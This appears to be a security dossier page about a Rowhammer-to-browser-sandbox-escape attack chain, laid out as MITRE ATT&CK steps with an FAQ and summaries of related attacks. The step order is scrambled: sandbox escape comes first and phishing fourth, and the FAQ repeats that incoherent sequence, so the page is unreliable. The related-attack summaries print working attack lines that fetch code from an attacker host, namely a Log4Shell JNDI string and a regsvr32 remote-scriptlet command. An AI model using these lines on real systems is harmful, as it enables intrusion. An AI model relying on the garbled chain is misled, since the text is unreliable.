Rowhammer → bit flip → in-browser sandbox escape
JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.
§ Context
Assumed environment: target client device has DRAM susceptible to Rowhammer (most pre-2020 DDR4 in laptops / desktops). No DRAM ECC, no in-browser Rowhammer mitigations active.
§ Steps
- 01. Sandbox escape → arbitrary native code | Initial Access | T1190 — Exploit Public-Facing Application
- 02. Acquire read/write primitive in browser | Execution | T1059 — Command and Scripting Interpreter
- 03. Drop local implant | Persistence | T1547 — Boot or Logon Autostart Execution
- 04. Phish / drive-by to attacker page | Initial Access | T1566 — Phishing
- 05. Achieve targeted bit flip in PTE | Privilege Escalation | HW-ROWHAMMER — Rowhammer Bit Flip
- 06. Hammer adjacent DRAM rows from JS | Privilege Escalation | HW-ROWHAMMER — Rowhammer Bit Flip
§ References
§ Frequently asked
- What is the "Rowhammer → bit flip → in-browser sandbox escape" attack path?
- JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Sandbox escape → arbitrary native code (T1190) — an Initial Access primitive. Assumed environment: target client device has DRAM susceptible to Rowhammer (most pre-2020 DDR4 in laptops / desktops).
- What is the final impact of this kill-chain?
- The final step lands on Hammer adjacent DRAM rows from JS (HW-ROWHAMMER), which falls under Privilege Escalation. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques: 3
V8 type-confusion 1-day → renderer RCE
Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.
- Shared techniques: 2
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- Shared techniques: 2
Squiblydoo: regsvr32 → remote SCT execution
`regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll`. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- Shared techniques: 2
OneNote .one attachment → embedded payload → C2
OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.
- Shared techniques: 2
Compromised vendor mailbox → reply-chain phishing → client compromise
Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- Shared techniques: 2
Gatekeeper bypass → unsigned binary execution
Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.